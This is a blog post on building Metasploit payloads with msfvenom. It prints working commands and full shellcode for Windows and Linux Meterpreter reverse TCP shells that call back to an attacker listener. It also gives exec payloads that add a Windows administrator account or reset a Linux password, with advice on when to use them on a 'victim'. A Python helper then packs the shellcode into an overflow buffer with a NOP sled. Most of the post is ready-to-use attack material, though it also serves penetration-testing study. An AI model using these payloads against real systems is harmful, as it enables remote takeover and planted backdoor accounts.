Sunday, June 11, 2017

Generating Meterpreter Payload with Msfvenom

Generate a Windows x86 Meterpreter reverse TCP shell that connects back to the listener (LHOST) at 192.168.0.182 on port 443, encoded to avoid the bad characters \x00, \x0a and \x0d, and output as Python source:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.182 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d" -f python

Generate the equivalent Linux x86 Meterpreter reverse TCP shell, connecting back to 192.168.0.182 on port 443, again without the bad characters \x00, \x0a and \x0d, output as Python source:

# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.182 LPORT=443  EXITFUNC=thread -b "\x00\x0a\x0d" -f python

Output (from the Windows command, as the first line shows; because -b was given without -e, msfvenom picked an encoder itself and chose x86/shikata_ga_nai):

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of python file: 1834 bytes
buf =  ""
buf += "\xba\xf9\x4b\x32\x9e\xda\xd1\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x59\x31\x57\x14\x03\x57\x14\x83\xc7\x04\x1b"
buf += "\xbe\xce\x76\x59\x41\x2f\x87\x3d\xcb\xca\xb6\x7d\xaf"
buf += "\x9f\xe9\x4d\xbb\xf2\x05\x26\xe9\xe6\x9e\x4a\x26\x08"
buf += "\x16\xe0\x10\x27\xa7\x58\x60\x26\x2b\xa2\xb5\x88\x12"
buf += "\x6d\xc8\xc9\x53\x93\x21\x9b\x0c\xd8\x94\x0c\x38\x94"
buf += "\x24\xa6\x72\x39\x2d\x5b\xc2\x38\x1c\xca\x58\x63\xbe"
buf += "\xec\x8d\x18\xf7\xf6\xd2\x24\x41\x8c\x21\xd3\x50\x44"
buf += "\x78\x1c\xfe\xa9\xb4\xef\xfe\xee\x73\x0f\x75\x07\x80"
buf += "\xb2\x8e\xdc\xfa\x68\x1a\xc7\x5d\xfb\xbc\x23\x5f\x28"
buf += "\x5a\xa7\x53\x85\x28\xef\x77\x18\xfc\x9b\x8c\x91\x03"
buf += "\x4c\x05\xe1\x27\x48\x4d\xb2\x46\xc9\x2b\x15\x76\x09"
buf += "\x94\xca\xd2\x41\x39\x1f\x6f\x08\x56\xec\x42\xb3\xa6"
buf += "\x7a\xd4\xc0\x94\x25\x4e\x4f\x95\xae\x48\x88\xda\x85"
buf += "\x2d\x06\x25\x25\x4e\x0e\xe2\x71\x1e\x38\xc3\xf9\xf5"
buf += "\xb8\xec\x2c\x63\xbc\x7a\x0e\xdc\xbe\xcc\xe6\x1f\xbf"
buf += "\x31\x4d\x96\x59\x61\xe1\xf9\xf5\xc2\x51\xba\xa5\xaa"
buf += "\xbb\x35\x99\xcb\xc4\x9f\xb2\x66\x2a\x76\xea\x1e\xd3"
buf += "\xd3\x60\xbe\x1c\xce\x0c\x80\x96\xfb\xf1\x4f\x5e\x89"
buf += "\xe1\xb8\x3f\x71\xfa\x38\xd5\x71\x90\x3c\x7f\x25\x0c"
buf += "\x3f\xa6\x01\x93\xc0\x8d\x11\xd4\x3f\x53\x20\xae\x76"
buf += "\xc1\x0c\xd8\x76\x05\x8d\x18\x21\x4f\x8d\x70\x95\x2b"
buf += "\xde\x65\xda\xe6\x72\x36\x4f\x08\x23\xea\xd8\x60\xc9"
buf += "\xd5\x2f\x2f\x32\x30\x2c\x37\xcc\xc6\x11\x9f\xa5\x38"
buf += "\x16\x1f\x36\x53\x96\x4f\x5e\xa8\xb9\x60\xae\x51\x10"
buf += "\x29\xa6\xd8\xf5\x98\x57\xdc\xdf\x7c\xc6\xdd\xec\xa4"
buf += "\x1f\x50\x12\x5b\x20\x92\x2f\x8a\x19\xe0\x68\x0f\x1e"
buf += "\xeb\x6a\xa5\x6b\x84\x32\x2c\xd6\xc9\xc4\x9b\x15\xf4"
buf += "\x46\x29\xe6\x03\x56\x58\xe3\x48\xd0\xb1\x99\xc1\xb5"
buf += "\xb5\x0e\xe1\x9f"

In my experience the reverse TCP shell is not always reliable: the connection may fail because of a bad network link, a firewall blocking the outbound connection, or for some other reason that is hard to pin down. If that happens to you, I recommend generating a windows/exec payload instead; it simply runs a command on the victim and needs no connection back. Example:

# msfvenom -a x86 --platform Windows -p windows/exec CMD='net user administrator qwerty /add' -f python

No encoder or badchars specified, outputting raw payload
Payload size: 219 bytes
Final size of python file: 1056 bytes
buf =  ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
buf += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"
buf += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
buf += "\xff\xd5\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64"
buf += "\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x20\x71"
buf += "\x77\x65\x72\x74\x79\x20\x2f\x61\x64\x64\x00"

Of course, this only helps if you have some way to log in with the new account, such as RDP running on the victim server; otherwise adding an administrator user is of little use. Two caveats: the built-in Administrator account already exists on every Windows host (it may be disabled), so `net user administrator qwerty /add` will report that the account already exists. Use a fresh user name, or drop /add to reset the password of an existing account. Also, the exec payload runs with the privileges of the exploited process, so creating a local administrator needs that process to be elevated.

The same can be done on a Linux host, provided you have another way in such as SSH. Note that `chpasswd` only sets the password of an account that already exists (here `hacker`) and must run as root. In that case you can use:

# msfvenom -p linux/x86/exec CMD='echo hacker:pass123 | chpasswd' -f python
 
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 66 bytes
Final size of python file: 334 bytes
buf =  ""
buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1f"
buf += "\x00\x00\x00\x65\x63\x68\x6f\x20\x68\x61\x63\x6b\x65"
buf += "\x72\x3a\x70\x61\x73\x73\x31\x32\x33\x20\x7c\x20\x63"
buf += "\x68\x70\x61\x73\x73\x77\x64\x00\x57\x53\x89\xe1\xcd"
buf += "\x80" 
 
As you may have noticed, the shellcode for the exec payloads is much smaller than the reverse shell (66 and 219 bytes versus 381, which also includes the shikata_ga_nai decoder stub).
This is an advantage when writing buffer overflow exploits with limited buffer space. Keep in mind that the exec payload grows with the length of CMD, and that stripping bad characters with -b adds an encoder stub on top of the raw size shown here.
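As an added example (not part of the original post), here is a small Python helper that takes msfvenom's -f python output, turns it back into raw bytes, verifies that none of the bad characters you would pass with -b survive, and drops the payload into a fixed-size exploit buffer. It uses the 66-byte linux/x86/exec payload printed above as its input; the function names, the 100-byte buffer size, the NOP sled and the 'A' padding are my own choices for illustration.

```python
import re

# The raw linux/x86/exec payload exactly as msfvenom printed it above
# (-f python, no encoder). Kept as a raw string so the \x escapes stay literal.
MSFVENOM_PYTHON_OUTPUT = r'''
buf =  ""
buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1f"
buf += "\x00\x00\x00\x65\x63\x68\x6f\x20\x68\x61\x63\x6b\x65"
buf += "\x72\x3a\x70\x61\x73\x73\x31\x32\x33\x20\x7c\x20\x63"
buf += "\x68\x70\x61\x73\x73\x77\x64\x00\x57\x53\x89\xe1\xcd"
buf += "\x80"
'''

# Matches both the 'buf =  ""' and the 'buf += "\x.."' lines of -f python output.
_BUF_LINE = re.compile(r'^\s*buf\s*\+?=\s*"((?:\\x[0-9a-fA-F]{2})*)"\s*$')


def parse_msfvenom_python(text):
    """Convert msfvenom -f python output back into the raw shellcode bytes."""
    shellcode = bytearray()
    for line in text.splitlines():
        m = _BUF_LINE.match(line)
        if m:
            shellcode += bytes.fromhex(m.group(1).replace("\\x", ""))
    return bytes(shellcode)


def find_bad_chars(shellcode, badchars):
    """Return (offset, byte) for every byte of shellcode that is in badchars.

    An empty list means the payload survives a sink that rejects badchars
    (for the usual -b "\\x00\\x0a\\x0d": C string copies, line-based protocols).
    """
    return [(i, b) for i, b in enumerate(shellcode) if b in badchars]


def build_buffer(shellcode, space, badchars=b"", nop=b"\x90", sled=16):
    """Place a NOP sled and the shellcode in a buffer of exactly `space` bytes.

    The remainder is filled with 'A' padding (hypothetical layout). Raises
    ValueError if the payload does not fit or still contains bad characters,
    which is the check you want before spending a limited overflow buffer on it.
    """
    bad = find_bad_chars(shellcode, badchars)
    if bad:
        raise ValueError("bad chars at offsets %s" % [off for off, _ in bad])
    if sled + len(shellcode) > space:
        raise ValueError("payload needs %d bytes, only %d available"
                         % (sled + len(shellcode), space))
    payload = nop * sled + shellcode
    return payload + b"A" * (space - len(payload))


if __name__ == "__main__":
    sc = parse_msfvenom_python(MSFVENOM_PYTHON_OUTPUT)
    print("payload size:", len(sc))                 # 66, as msfvenom reported
    bad = find_bad_chars(sc, b"\x00\x0a\x0d")
    print("bad chars:", [(off, "\\x%02x" % b) for off, b in bad])
    # The raw exec payload contains NUL bytes (the string terminators and the
    # call rel32 operand), so a strcpy-style sink would truncate it; rerun
    # msfvenom with -b to get an encoded version before using it there.
    print("fits in 100 bytes:", len(build_buffer(sc, 100)) == 100)
```

Running it shows why the raw exec payload is only usable as-is where NUL bytes are allowed: five of its 66 bytes are \x00 (the terminators of "/sh" and of the command string, plus three bytes of the call operand), while \x0a and \x0d never appear. Pass `badchars=b"\x00"` to `build_buffer` and it refuses the raw payload, which is the point at which you go back to msfvenom with -b.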
 
 
 
 
